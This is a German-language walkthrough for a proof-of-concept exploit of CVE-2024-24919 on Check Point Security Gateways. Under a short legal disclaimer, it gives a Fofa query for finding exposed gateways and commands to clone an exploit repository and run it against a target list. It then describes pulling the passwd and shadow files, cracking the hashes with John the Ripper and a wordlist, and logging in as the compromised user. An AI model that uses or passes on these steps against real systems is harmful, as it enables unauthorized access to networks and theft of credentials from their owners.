
PoC – CVE-2024–24919 – Check Point Security Gateways
Dies könnte es einem Angreifer ermöglichen, bestimmte Informationen auf Check Point Security Gateways zu lesen, sobald diese mit dem Internet verbunden und mit Remote Access VPN oder Mobile Access Software Blades aktiviert sind. Ein Sicherheitsupdate, das diese Schwachstelle entschärft, ist verfügbar.
Mehr dazu — CVE-2024-24919
Haftungsausschluss: Dieser Proof of Concept (POC) dient ausschließlich Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. Es liegt in der Verantwortung des Endbenutzers, alle geltenden lokalen, staatlichen und bundesstaatlichen Gesetze einzuhalten. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Verwende Fofa (ähnlich wie Shodan.io), um mögliche Ziele zu finden:
app=”Check_Point-SSL-Network-Extender”
Zuerst das Repository klonen:
git clone https://github.com/verylazytech/CVE-2024-24919
Wähle als Nächstes dein Ziel und füge es im folgenden Format zur Datei list.txt hinzu:
Führe den Exploit aus:
python3 CVE-2024-24919.py -l list.txt
Nun gibt es 2 mögliche Ausgaben:
Erfolglos:

Erfolgreich:

Nachdem du sowohl die Dateien passwd als auch shadow gefunden hast, kannst du versuchen, den Hash mit JohnTheRipper zu knacken. Nach dem Ausführen des Exploits hast du 2 Dateien, passwd und shadow. Du kannst sie also zu einer Datei zusammenführen und versuchen, sie zu knacken (ich habe rockyou.txt verwendet, aber es kann jede Passwort-Wortliste sein):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Und jetzt, nachdem wir den Hash geknackt haben, können wir uns als der Benutzer anmelden!